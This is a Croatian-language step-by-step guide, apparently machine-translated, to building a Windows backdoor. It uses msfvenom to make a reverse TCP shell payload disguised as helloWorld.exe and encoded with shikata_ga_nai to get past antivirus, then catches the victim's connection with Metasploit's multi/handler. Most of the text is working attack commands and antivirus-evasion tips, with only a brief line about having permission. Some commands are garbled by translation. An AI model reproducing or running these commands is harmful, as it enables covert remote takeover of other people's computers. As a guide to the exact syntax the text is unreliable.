Stražnja vrata koriste se za zaobilaženje sigurnosnih mehanizama, često tajno i uglavnom neprimjetno. Korištenjem MSFvenom -a, kombinacije msfpayload -a i msfencode -a, moguće je stvoriti stražnju vrata koja se povezuju natrag s napadačem koristeći TCP obrnute ljuske. Da biste razvili backdoor, morate promijeniti potpis svog zlonamjernog softvera kako biste izbjegli bilo koji antivirusni softver. Završite ovaj projekt na par računara kojima imate dozvolu za pristup, a tijekom toga ćete naučiti više o računalnoj sigurnosti i kako ova vrsta backdoor -a funkcionira.
Koraci
Korak 1. Pokrenite Kali i pokrenite terminalnu konzolu
Korak 2. Upišite ifconfig za prikaz sučelja i provjerite svoju IP adresu
Korak 3. Upišite msfvenom -l enkodere za prikaz popisa kodera
Kao koder ćete koristiti x86/shikata_ga_nai
Korak 4. Upišite "msfvenom -a x86 -platforma Windows -p windows/shell/reverse_tcp LHOST = 192.168.48.129 LPORT = 4444 -b" / x00 "-e x86/shikata_ga_nai -f exe> helloWorld.exe
- -a x86 -platforma Windows označava arhitekturu za upotrebu.
- -p windows/shell/reverse_tcp označava korisni teret za ugradnju.
- LHOST označava IP adresu slušatelja.
- LPORT označava port za slušanje.
- -b "\ x00" označava izbjegavanje loših znakova (nula bajtova).
- -e x86/shikata_ga_nai označava ime kodera.
- -f exe> helloWorld.exe označava izlaz formata.
Korak 5. Upišite msfconsole da biste aktivirali Metasploit
Sada ste generirali svoja stražnja vrata. Kada žrtva klikne na helloWorld.exe, ugrađeni korisnički teret ljuske će se aktivirati i uspostaviti vezu sa vašim sistemom. Da biste primili vezu, morate otvoriti multi-handler u Metasploitu i postaviti korisni teret
Korak 6. Upišite use exploit/multi/handler
Korak 7. Upišite set payload windows/shell/reverse_tcp
Korak 8. Upišite show options za provjeru modula
Korak 9. Skup tipova LHOST 192.168.48.129
"LHOST" označava IP adresu slušatelja
Korak 10. Ukucajte set LPORT 4444
"LPORT" označava port za slušanje
Korak 11. Upišite run i pričekajte vezu sa računara žrtve
Korak 12. Sačekajte da žrtva klikne na helloWorld.exe
Tada ćete biti uspješno povezani sa žrtvinim strojem.
Savjeti
- Korištenje -i u MSFvenom -u predstavljat će iteracije kodiranja. Ponekad više ponavljanja može pomoći u izbjegavanju AV softvera.
- Naučili ste kako generirati backdoor i kodirati pomoću MSFvenom -a, ali ova metoda neće savršeno funkcionirati protiv nekih AV softvera u današnje vrijeme. Razlog tome su predlošci izvođenja u MSFvenom -u. Proizvođači AV dodali su statičke potpise ovih predložaka i samo ih traže. Rješenje za ovaj problem je upotreba drugog predloška izvršenja ili različitih alata.